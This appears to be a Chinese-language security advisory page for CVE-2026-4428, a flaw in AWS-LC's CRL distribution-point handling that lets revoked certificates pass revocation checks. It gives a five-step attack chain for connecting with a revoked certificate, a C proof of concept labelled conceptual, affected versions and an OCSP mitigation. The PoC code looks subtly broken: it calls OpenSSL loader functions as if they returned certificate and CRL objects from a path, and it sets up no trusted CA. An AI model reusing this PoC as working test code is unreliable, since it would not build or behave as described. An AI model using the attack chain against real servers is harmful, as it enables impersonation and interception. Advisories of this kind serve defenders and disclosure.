CVE-2026-4428 CVSS 7.4 高危

CVE-2026-4428 AWS-LC证书吊销验证绕过漏洞

披露日期: 2026-03-19

来源: ff89ba41-3aa1-4d27-914a-91399e9639e5

漏洞信息

漏洞编号

CVE-2026-4428

漏洞类型

验证绕过

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AWS-LC

漏洞概述

AWS-LC 1.71.0之前版本在处理CRL分发点验证时存在逻辑错误，导致分区CRL被错误拒绝。这使得已吊销的证书能够绕过吊销检查，攻击者可利用已吊销证书建立信任连接，造成严重安全风险。建议用户尽快升级至修复版本。

技术细节

该漏洞源于AWS-LC库在验证证书吊销列表（CRL）分发点时的逻辑缺陷。当证书颁发机构使用分区的CRL来管理证书吊销状态时，受影响版本的代码未能正确匹配分发点范围，错误地将合法的分区CRL判定为“out of scope”并予以忽略。因此，在验证证书状态时，即使证书已被吊销，由于关键的吊销信息被丢弃，验证流程仍会错误地返回证书有效。这破坏了PKI信任链的完整性，允许持有已吊销私钥的攻击者绕过身份验证，进行中间人攻击或未授权访问。

攻击链分析

STEP 1

侦察

识别目标系统使用的AWS-LC库版本低于1.71.0。

STEP 2

资源获取

获取目标信任的CA签发的已吊销证书及其私钥。

STEP 3

发起攻击

攻击者使用已吊销的证书向目标服务器发起TLS连接请求。

STEP 4

验证绕过

目标服务器的AWS-LC库在验证CRL时，因逻辑漏洞忽略分区CRL，错误认定证书有效。

STEP 5

建立连接

攻击者成功建立信任连接，可进行数据拦截或未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <openssl/x509.h>
#include <stdio.h>

// Conceptual Proof of Concept for CVE-2026-4428
// Demonstrates that a revoked certificate is accepted due to partitioned CRL logic error.

int main() {
    printf("Testing CVE-2026-4428: AWS-LC CRL Validation Bypass\n");
    
    // 1. Load a revoked certificate
    X509 *cert = X509_load_cert_file("revoked_cert.pem", X509_FILETYPE_PEM);
    // 2. Load a partitioned CRL that contains the serial number of the revoked cert
    X509_CRL *crl = X509_load_crl_file("partitioned_crl.pem", X509_FILETYPE_PEM);
    
    X509_STORE *store = X509_STORE_new();
    X509_STORE_add_crl(store, crl);
    // Enable CRL checking
    X509_STORE_set_flags(store, X509_V_FLAG_CRL_CHECK);

    X509_STORE_CTX *ctx = X509_STORE_CTX_new();
    X509_STORE_CTX_init(ctx, store, cert, NULL);

    // 3. Verify the certificate
    int result = X509_verify_cert(ctx);

    if (result == 1) {
        // In a patched version, this should fail.
        // In vulnerable versions (< 1.71.0), logic error ignores the partitioned CRL.
        printf("[!] VULNERABILITY CONFIRMED: Revoked certificate was accepted.\n");
    } else {
        printf("[+] Check passed: Certificate correctly rejected.\n");
    }

    X509_STORE_CTX_free(ctx);
    X509_STORE_free(store);
    return 0;
}

影响范围

AWS-LC < 1.71.0

AWS-LC-FIPS < 3.3.0

防御指南

临时缓解措施

若无法立即升级，建议在系统中配置优先使用OCSP（在线证书状态协议）进行证书状态验证，作为CRL的替代方案，以规避该逻辑漏洞带来的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表